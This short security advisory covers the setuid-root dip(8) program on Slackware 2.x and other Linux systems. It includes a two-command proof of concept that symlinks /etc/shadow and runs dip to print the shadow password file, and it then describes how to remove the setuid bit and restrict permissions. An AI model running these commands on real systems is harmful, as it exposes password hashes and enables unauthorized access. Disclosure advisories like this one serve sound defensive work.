dip(8)
Systems Affected:Slackware 2.0, 2.1, 2.2, 2.3. Other Linux
systems.
Problem:

dip(8) is installed setuid root and world executable by default. This allows a user to read any file
on the system.

	$ ln -s /etc/shadow /tmp/dummy.dip
	$ /sbin/dip -v /tmp/dummy.dip
	[ Shadow password file and some garbage ]


Solution:Turn off the setuid bit. Change the group to
modem and chmod to 2110. Then chgrp all your /dev/ttyS* and /dev/cua* file
to modem and chmod them all to 660. You may need to do the same with your
getty, pppd, and dialout programs.